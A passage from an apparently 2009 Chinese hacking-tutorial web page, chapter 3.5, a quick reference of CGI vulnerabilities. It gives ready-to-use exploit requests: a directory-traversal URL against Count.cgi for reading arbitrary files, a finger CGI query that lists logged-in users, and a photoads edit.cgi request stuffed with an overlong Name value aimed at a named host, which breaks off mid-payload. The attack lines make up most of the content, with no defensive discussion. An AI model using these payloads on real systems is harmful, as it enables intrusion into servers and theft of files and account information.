当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-安全防入侵与防病毒基础(11)

安全基础
104种木马的清除方法(8)
104种木马的清除方法(9)
104种木马的清除方法(10)
端口截听实现端口隐藏嗅探与攻击(1)
端口截听实现端口隐藏嗅探与攻击(2)
SYN 攻击原理以及防范技术(1)
SYN 攻击原理以及防范技术(2)
Windows的几个严重的漏洞
黑客技术--SunFTP(DoS攻击)
禁用QoS 多出20%的网络带宽?
横刀立斩DDoS魔爪
五分钟全面打造你的安全防线
禁止Windowstftp客户端使用
教你如何防范自己的IP泄漏
用户口令保护新招(1)
用户口令保护新招(2)
网络钓鱼的三种方法(1)
网络钓鱼的三种方法(2)
动网的新灾难-插件漏洞
用net start 可以启动肉鸡的命令(1)

安全基础 中的 黑客攻防技术内幕-安全防入侵与防病毒基础(11)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 106 ::
收藏到网摘: n/a

3.5 CGI及系统漏洞速查(2)

    

Count.cgi看图片:

http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

JFS

漏洞介绍:利用photoads这个CGI模块攻入主机,可以入侵PCWEEK-LINUX 主机,具体如下:

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&[email protected]&Name= 11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111